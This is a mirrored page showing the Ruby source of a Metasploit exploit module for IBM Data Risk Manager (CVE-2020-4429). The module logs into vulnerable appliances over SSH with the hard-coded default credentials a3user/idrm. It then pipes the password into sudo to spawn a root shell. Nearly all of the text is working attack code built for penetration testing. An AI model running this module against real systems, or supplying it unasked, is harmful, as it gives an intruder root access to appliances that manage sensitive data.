Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/ssh/ibm_drm_a3user.rb
27885 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::SSH

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'IBM Data Risk Manager a3user Default Password',

16
        'Description' => %q{

17
          This module abuses a known default password in IBM Data Risk Manager. The 'a3user'

18
          has the default password 'idrm' and allows an attacker to log in to the virtual appliance

19
          via SSH. This can be escalate to full root access, as 'a3user' has sudo access with the default password.

20
          At the time of disclosure this was an 0day, but it was later confirmed and patched by IBM.

21
          Versions <= 2.0.6.1 are confirmed to be vulnerable.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module

26
        ],

27
        'References' => [

28
          [ 'CVE', '2020-4429' ], # insecure default password

29
          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],

30
          [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],

31
          [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'],

32
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]

33
        ],

34
        'Payload' => {

35
          'Compat' => {

36
            'PayloadType' => 'cmd_interact',

37
            'ConnectionType' => 'find'

38
          }

39
        },

40
        'Platform' => 'unix',

41
        'Arch' => ARCH_CMD,

42
        'Targets' => [

43
          [ 'IBM Data Risk Manager <= 2.0.6.1', {} ]

44
        ],

45
        'Privileged' => true,

46
        'DefaultTarget' => 0,

47
        'DisclosureDate' => '2020-04-21',

48
        'Notes' => {

49
          'Stability' => [CRASH_SAFE],

50
          'Reliability' => [REPEATABLE_SESSION],

51
          'SideEffects' => []

52
        }

53
      )

54
    )

55


56
    register_options(

57
      [

58
        Opt::RPORT(22),

59
        OptString.new('USERNAME', [true, 'Username to login with', 'a3user']),

60
        OptString.new('PASSWORD', [true, 'Password to login with', 'idrm'])

61
      ]

62
    )

63


64
    register_advanced_options(

65
      [

66
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),

67
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])

68
      ]

69
    )

70
  end

71


72
  def on_new_session(client)

73
    print_status("#{peer} - Escalating privileges to root, please wait a few seconds...")

74
    # easiest way I found to get passwordless root, not sure if there's a shorter command

75
    client.shell_command_token("echo #{datastore['PASSWORD']} | sudo -S 'echo 2>/dev/null'; sudo /bin/sh")

76
    print_good("#{peer} - Done, enjoy your root shell!")

77
  end

78


79
  def rhost

80
    datastore['RHOST']

81
  end

82


83
  def rport

84
    datastore['RPORT']

85
  end

86


87
  def peer

88
    "#{rhost}:#{rport}"

89
  end

90


91
  def do_login(user, pass)

92
    opts = ssh_client_defaults.merge({

93
      auth_methods: ['password', 'keyboard-interactive'],

94
      port: rport,

95
      password: pass

96
    })

97


98
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

99


100
    begin

101
      ssh =

102
        ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

103
          Net::SSH.start(rhost, user, opts)

104
        end

105
    rescue Rex::ConnectionError

106
      fail_with(Failure::Unknown, "#{peer} SSH - Connection error")

107
    rescue Net::SSH::Disconnect, ::EOFError

108
      fail_with(Failure::Unknown, "#{peer} SSH - Disconnected during negotiation")

109
    rescue ::Timeout::Error

110
      fail_with(Failure::Unknown, "#{peer} SSH - Timed out during negotiation")

111
    rescue Net::SSH::AuthenticationFailed

112
      fail_with(Failure::Unknown, "#{peer} SSH - Failed authentication")

113
    rescue Net::SSH::Exception => e

114
      fail_with(Failure::Unknown, "#{peer} SSH Error: #{e.class} : #{e.message}")

115
    end

116


117
    return Net::SSH::CommandStream.new(ssh, logger: self) if ssh

118


119
    nil

120
  end

121


122
  def exploit

123
    user = datastore['USERNAME']

124
    pass = datastore['PASSWORD']

125


126
    print_status("#{peer} - Attempting to log in to the IBM Data Risk Manager appliance...")

127
    conn = do_login(user, pass)

128
    if conn

129
      print_good("#{peer} - Login successful (#{user}:#{pass})")

130
      handler(conn.lsock)

131
    end

132
  end

133
end

134


135